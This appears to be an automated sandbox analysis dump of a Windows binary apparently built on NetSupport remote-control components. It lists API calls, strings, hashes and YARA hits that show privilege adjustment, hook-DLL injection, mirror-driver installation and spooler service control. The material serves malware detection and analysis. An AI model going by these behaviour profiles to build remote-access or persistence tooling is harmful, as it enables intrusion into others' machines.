                                                                                          • String ID: Norwegian-Nynorsk
                                                                                          • API String ID: 3475089800-461349085
                                                                                          • Opcode ID: 2cdfa383db7a5364afec4a5bea0e215fc78a568d75881a5c966e946e4fb3c64d
                                                                                          • Instruction ID: 3a7a93a38f069acdadfa2479906f1f97261035475881df31c1158597420056e6
                                                                                          • Opcode Fuzzy Hash: 2cdfa383db7a5364afec4a5bea0e215fc78a568d75881a5c966e946e4fb3c64d
                                                                                          • Instruction Fuzzy Hash: 7951C3716C0313ABEB285F31CCADBA77BA6BF04740F098525E9489B2D1D7B4DC91C6A1
                                                                                          APIs
                                                                                          • CoInitialize.OLE32(00000000), ref: 005A83BC
                                                                                          • CoCreateInstance.OLE32(0061B4B8,00000000,00000001,0061B4D4,?), ref: 005A8402
                                                                                          • CoUninitialize.OLE32 ref: 005A84DD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                          • String ID: Disabled $Enabled $Removed
                                                                                          • API String ID: 948891078-2230107431
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 005D4459
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005D4460
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 005D4475
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005D4499
                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 005D44A3
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentExitLoadLookupOpenPrivilegePrivilegesStringValueWindowswvsprintf
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 4148835054-3733053543
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 005AEAC6
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005AEACD
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 005AEAE2
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005AEB06
                                                                                          • CloseHandle.KERNEL32(?), ref: 005AEB10
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID: SeLoadDriverPrivilege
                                                                                          • API String ID: 3038321057-497486668
                                                                                          APIs
                                                                                            • Part of subcall function 005FA89A: SetFilePointer.KERNEL32(00000000,00BFBBEF,00000003,00000010,00BFBBEF,00BFBBEF,00605FC8,00605FC8,?,005EDF50,00BFBBEF,00000000,00000000,00000002,005B06CD,00000000), ref: 005FA8DC
                                                                                            • Part of subcall function 005FA89A: GetLastError.KERNEL32(?,005EDF50,00BFBBEF,00000000,00000000,00000002,005B06CD,00000000,005B06CD,?,005EE60F,005B06CD,00000000,00070000,00633068,00000010), ref: 005FA8E9
                                                                                          • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109,00000000), ref: 0060C145
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109,00000000), ref: 0060C14C
                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92), ref: 0060C1C8
                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109), ref: 0060C1CF
                                                                                          • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92), ref: 0060C22A
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109), ref: 0060C257
                                                                                          Similarity
                                                                                          • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                          • String ID:
                                                                                          • API String ID: 1354853467-0
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00602DAD,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602783
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00602DAD,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 006027AC
                                                                                          • GetACP.KERNEL32(?,?,00602DAD,?,005F3632,?,000000BC,?,00000001,00000000), ref: 006027C0
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 005EFA2B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005EFA40
                                                                                          • UnhandledExceptionFilter.KERNEL32(0062B7A0), ref: 005EFA4B
                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 005EFA67
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 005EFA6E
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 2579439406-0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 005F64CC
                                                                                            • Part of subcall function 005F5B13: Sleep.KERNEL32(00000000,00000000,?,?), ref: 005F5B3B
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 005F65A9
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 005F65C9
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 005F6605
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ErrorLastSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1708069870-0
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(000F01FF), ref: 005AC08D
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005AC094
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005AC0A5
                                                                                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 005AC0C9
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID:
                                                                                          • API String ID: 2349140579-0
                                                                                          APIs
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • GetTimeZoneInformation.KERNEL32(00643200,00000000,00000000,00000000,00000000,00000000,00633218,0000002C,005F15FA,00633238,00000008,005E8928,?,?,00000000,?), ref: 005F1014
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00643204,?,?,0000003F,00000000,?), ref: 005F1092
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00643258,000000FF,00000003,0000003F,00000000,?), ref: 005F10C6
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 00602986
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 006029C7
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 00602A6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: InfoLocale
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080), ref: 00608712
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000080), ref: 0060877B
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00000000,00000000,00000000,?,?,?,?,?,00000080), ref: 00608799
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: InfoLocale$ByteCharMultiWide
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,?,00000000,00000000,?,005AD67C,0000025E,cant create events), ref: 005AC10C
                                                                                          • CloseHandle.KERNEL32(?,?,005AD67C,0000025E,cant create events), ref: 005AC115
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 00602B50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: InfoLocale
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0060287C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: InfoLocale
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 00602901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: InfoLocale
                                                                                          APIs
                                                                                          • EnumSystemLocalesA.KERNEL32(0060293B,00000001,00602D3C,00000001,00000000,00000000), ref: 00602C3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • API ID: EnumLocalesSystem
                                                                                          APIs
                                                                                          • EnumSystemLocalesA.KERNEL32(00602B0C,00000001,00602D0C,00000083,00000000,000000BC,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602C8A
                                                                                          Similarity
                                                                                          • API ID: EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2099609381-0
                                                                                          APIs
                                                                                          • EnumSystemLocalesA.KERNEL32(Function_00072839,00000001), ref: 00602BE7
                                                                                          Similarity
                                                                                          • API ID: EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2099609381-0
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0006A198), ref: 005FA1DF
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E0547
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005E0560
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E059B
                                                                                          • GetProcAddress.KERNEL32(?,MySetHook), ref: 005E05CB
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005E05F3
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 005E0607
                                                                                          • wsprintfW.USER32 ref: 005E065C
                                                                                          • CreateEventW.KERNEL32(?,00000000,00000000,?), ref: 005E0674
                                                                                          • GetDesktopWindow.USER32 ref: 005E068C
                                                                                          • SendMessageW.USER32(00000000), ref: 005E0693
                                                                                          • Sleep.KERNEL32(0000000F), ref: 005E069B
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599791
                                                                                            • Part of subcall function 00599770: GetWindowLongW.USER32(00000000,000000F0), ref: 005997A4
                                                                                            • Part of subcall function 00599770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 005997C2
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599839
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000F), ref: 005E06C9
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,NSMViewPaused), ref: 005E0701
                                                                                          • IsWindow.USER32(?), ref: 005E0721
                                                                                          • GetClassNameW.USER32(?,?,00000080), ref: 005E073C
                                                                                          • IsWindowVisible.USER32(?), ref: 005E07BC
                                                                                          • SetEvent.KERNEL32(?), ref: 005E07F8
                                                                                          • IsWindow.USER32(?), ref: 005E0811
                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0000000F), ref: 005E0851
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 005E0993
                                                                                            • Part of subcall function 005E0220: SendInput.USER32(00000002,?,0000001C), ref: 005E0287
                                                                                          • Sleep.KERNEL32(00000032), ref: 005E08B2
                                                                                          • IsWindow.USER32(?), ref: 005E08FE
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000F), ref: 005E091A
                                                                                          • GetProcAddress.KERNEL32(?,MyUnhook), ref: 005E09C5
                                                                                          • GetDesktopWindow.USER32 ref: 005E09EC
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 005E0A00
                                                                                          • OpenProcess.KERNEL32(00000600,00000000,?), ref: 005E0A19
                                                                                          • OpenProcess.KERNEL32(00000200,00000000,?), ref: 005E0A2E
                                                                                          • GetPriorityClass.KERNEL32(00000000), ref: 005E0A37
                                                                                          • SetPriorityClass.KERNEL32(00000000,00000080), ref: 005E0A4C
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$Process$Wait$ClassEventObjectOpenSingle$AddressCreateDesktopFindLibraryLoadNamePriorityProcSendSleepThread$AttributeFileInputLongMessageModuleMultipleObjectsVisiblewsprintf
                                                                                          • String ID: Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$\NSL\$winsthooks.dll
                                                                                          • API String ID: 1121615632-101993463
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 005D3308
                                                                                          • GetLastError.KERNEL32 ref: 005D333A
                                                                                          • OpenServiceW.ADVAPI32(00000000,spooler,00000034), ref: 005D335C
                                                                                          • GetLastError.KERNEL32 ref: 005D3364
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D338B
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 005D33D7
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D33F8
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D340F
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D341D
                                                                                          • GetLastError.KERNEL32 ref: 005D3455
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D3547
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D3561
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D356C
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 005D3595
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Service$ErrorLastQueryStatus$CloseHandleOpenSleepwsprintf$DirectoryLocalManagerStartSystemTimewvsprintf
                                                                                          • String ID: Attempt to start the service$Attempt to stop the service$ControlService failed with %d$START$STOP$Serivce isn't in Stopped state$Service Manager : %08x - %d$Service State : %d$Service is running$Service is stopped$Service isn't running$Service started ok$Service stopped ok$Servive failed to start after 60 seconds$Servive failed to stop after 60 seconds$StartService failed with %d$StartService ok$Use old method$\net$close service manager$close spooler service$hSpooler %08x - %d$spooler$spooler (%s)$spooler finished$start$stop
                                                                                          • API String ID: 3453032217-1626732039
                                                                                          APIs
                                                                                          • SendDlgItemMessageW.USER32(?,00000421,0000000E,?,?), ref: 005DA86D
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005DA87E
                                                                                          • EnableWindow.USER32(00000000), ref: 005DA885
                                                                                          • GetDlgItemTextA.USER32(?,00000421,00640F06,00000050), ref: 005DA8C0
                                                                                          • GetDlgItemTextA.USER32(?,00000422,00640EEA,0000000A), ref: 005DA8EB
                                                                                          • GetDlgItemTextA.USER32(?,00000423,00640EF4,00000006), ref: 005DA8FA
                                                                                          • GetDlgItemTextW.USER32(?,00000424,?,00000050), ref: 005DA90B
                                                                                          • LoadStringW.USER32(00590000,00000415,?,00000050), ref: 005DA922
                                                                                          • GetDlgItemTextW.USER32(?,00000425,?,00000050), ref: 005DA95C
                                                                                          • EndDialog.USER32(?,?), ref: 005DA977
                                                                                          • GetDlgItem.USER32(?,0000042E), ref: 005DA9C4
                                                                                          • ShowWindow.USER32(00000000), ref: 005DA9C7
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 005DA9CE
                                                                                          • ShowWindow.USER32(00000000), ref: 005DA9D1
                                                                                          • SendDlgItemMessageW.USER32(?,00000421,000000CF,00000001,00000000), ref: 005DA9E2
                                                                                          • SendDlgItemMessageW.USER32(?,00000422,000000CF,00000001,00000000), ref: 005DA9F7
                                                                                          • SendDlgItemMessageW.USER32(?,00000423,000000CF,00000001,00000000), ref: 005DAA0C
                                                                                          • SendDlgItemMessageW.USER32(?,00000424,000000CF,00000001,00000000), ref: 005DAA21
                                                                                          • GetDlgItem.USER32(?,00000425), ref: 005DAA2F
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAA32
                                                                                          • GetDlgItem.USER32(?,00000431), ref: 005DAA3C
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAA3F
                                                                                          • SendDlgItemMessageW.USER32(?,00000421,000000C5,0000004F,00000000), ref: 005DAA50
                                                                                          • SetDlgItemTextA.USER32(?,00000421,00640F06), ref: 005DAA61
                                                                                          • SetDlgItemTextA.USER32(?,00000422,00640EEA), ref: 005DAA72
                                                                                          • SetDlgItemTextA.USER32(?,00000423,00640EF4), ref: 005DAA83
                                                                                          • wsprintfW.USER32 ref: 005DAAC7
                                                                                          • SetDlgItemTextW.USER32(?,00000424,?), ref: 005DAADD
                                                                                          • GetDlgItem.USER32(?,00000422), ref: 005DAAF4
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAAF7
                                                                                          • GetDlgItem.USER32(?,00000423), ref: 005DAB01
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB04
                                                                                          • GetDlgItem.USER32(?,00000424), ref: 005DAB0E
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB11
                                                                                          • GetDlgItem.USER32(?,00000425), ref: 005DAB1B
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB1E
                                                                                          • GetDlgItem.USER32(?,00000431), ref: 005DAB28
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB2B
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005DAB41
                                                                                          • EnableWindow.USER32(00000000), ref: 005DAB44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Item$Window$ShowText$MessageSend$Enable$DialogLoadStringwsprintf
                                                                                          • String ID: %02d-%s-%d
                                                                                          APIs
                                                                                          • LocalAlloc.KERNEL32(00000040,00000014,DE64E134), ref: 005BC9C3
                                                                                          • LoadLibraryW.KERNEL32(Advapi32.dll), ref: 005BC9DE
                                                                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 005BCA4C
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCA91
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCA9B
                                                                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 005BCAA7
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCAF0
                                                                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 005BCB00
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCB49
                                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 005BCB58
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCB64
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCB93
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCBA0
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCBAA
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCBC9
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCBF5
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCC25
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCC54
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCC89
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCCB5
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCCE2
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCD11
                                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 005BCD23
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005BCD60
                                                                                          • GetProcAddress.KERNEL32(00000000,SetSecurityInfo), ref: 005BCD72
                                                                                            • Part of subcall function 005BC920: LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 005BC966
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCDA1
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005BCDAC
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCDC3
                                                                                          • LocalFree.KERNEL32(00000000), ref: 005BCDCE
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ErrorLast$FreeLocal$DescriptorLibrarySecurity$AccountAllocDaclInitializeLoadLookup
                                                                                          • String ID: Advapi32.dll$BuildExplicitAccessWithNameW$ConvertStringSidToSidW$S-1-5-18$S-1-5-32-544$S-1-5-32-545$SetEntriesInAclW$SetSecurityInfo
                                                                                          APIs
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Pixel$Line$Move$Object$Select$CreateDelete
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005AEFE9
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF0CD
                                                                                            • Part of subcall function 005AFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 005AFF66
                                                                                            • Part of subcall function 005AFF40: GetProcAddress.KERNEL32(00000000), ref: 005AFF6D
                                                                                            • Part of subcall function 005AFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 005AFF83
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AddressHandleModuleProcProcessSystem
                                                                                          • String ID: Try again after removing the 'Block Unsigned Driver Policy'$DISPLAY$InstallGdihook5 ret %d$New mirror installation, e=%d$Unloadable mirror detected - update on reboot$Updategdihook5 err=x%x$Updategdihook5 ok$\gdihook5.dll$copy %s to %s failed$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$pci_gdihook5_hwid$rename %s to %s on reboot failed$rename %s to %s on reboot ok$using .inf=%s
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005C4DED
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C4E57
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 005C4E83
                                                                                          • wsprintfW.USER32 ref: 005C4E92
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?), ref: 005C4EB8
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?), ref: 005C4EE4
                                                                                          • wsprintfW.USER32 ref: 005C4F2C
                                                                                          • wsprintfW.USER32 ref: 005C4F39
                                                                                          • wsprintfW.USER32 ref: 005C4F47
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C4F94
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 005C4FC0
                                                                                          • wsprintfW.USER32 ref: 005C4FD9
                                                                                          • wsprintfW.USER32 ref: 005C4FEE
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 005C5077
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?), ref: 005C50A3
                                                                                          • wsprintfW.USER32 ref: 005C50B9
                                                                                          • wsprintfW.USER32 ref: 005C50D2
                                                                                          • wsprintfW.USER32 ref: 005C50DF
                                                                                          • wsprintfW.USER32 ref: 005C50ED
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$ByteCharMultiWide
                                                                                          • String ID: (%d.%02d.%d.%d)$ + %d bytes$%p $%s + %d bytes$, %s, Line %d$<unknown module>$<unknown symbol>
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • LoadStringW.USER32(00590000,00000421,?,00000080), ref: 005D5258
                                                                                          • wsprintfW.USER32 ref: 005D528C
                                                                                          • wsprintfW.USER32 ref: 005D52A9
                                                                                          • wsprintfW.USER32 ref: 005D52DC
                                                                                          • RegCreateKeyW.ADVAPI32(80000000,?,?), ref: 005D5308
                                                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 005D5348
                                                                                          • RegCreateKeyW.ADVAPI32(?,command,?), ref: 005D537F
                                                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 005D53BA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D53D8
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D53E5
                                                                                          • wsprintfW.USER32 ref: 005D5400
                                                                                          • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 005D5417
                                                                                          • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 005D543A
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CloseCreateDeleteValue$LoadLocalStringTimewvsprintf
